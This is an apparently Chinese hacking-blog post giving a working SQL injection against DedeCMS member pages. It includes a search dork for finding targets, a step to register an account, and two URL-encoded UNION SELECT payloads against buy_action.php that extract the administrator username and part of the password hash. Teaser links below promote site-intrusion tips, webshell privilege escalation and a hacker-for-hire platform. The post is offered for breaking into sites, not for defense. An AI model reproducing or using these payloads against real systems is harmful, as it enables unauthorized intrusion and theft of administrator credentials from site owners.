dedecms注入爆管理员用户密码 ***

hacker5年前 (2020-05-31)黑客文章992

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

之前，网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站看了一下，ecshop的直接...

侧门和木马病毒有什么不同？我觉得严苛实际意义沒有差别的，微小的区别是有的。有一个微小区别先讲一下，这两个词出去早中晚不一样。老一代网络黑客，不屑黑本人设备（那时候本人机网速太慢），觉得网络服务器才...

入侵网站时的十种小经验 1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/for...

详解webshell提权服务器的21种方法 1.radmin连接法条件是你权限够大，对方连防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去...

如果你是一位网络管理员或者是一位普通的拨号用户，可能经常会遇到这样一种情形，那就是访问某一个网站时可能会花费好长时间，或者根本就无法访问需要的网站，这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

什么叫Etherape？ Etherape是以太网接口仿真模拟的图型网络监视器。它具备以图型方法显示信息互联网主题活动的IP，TCP和链路层方式。连接和服务器的尺寸随总流量而转变。它还具备颜色编码协...

找黑客平台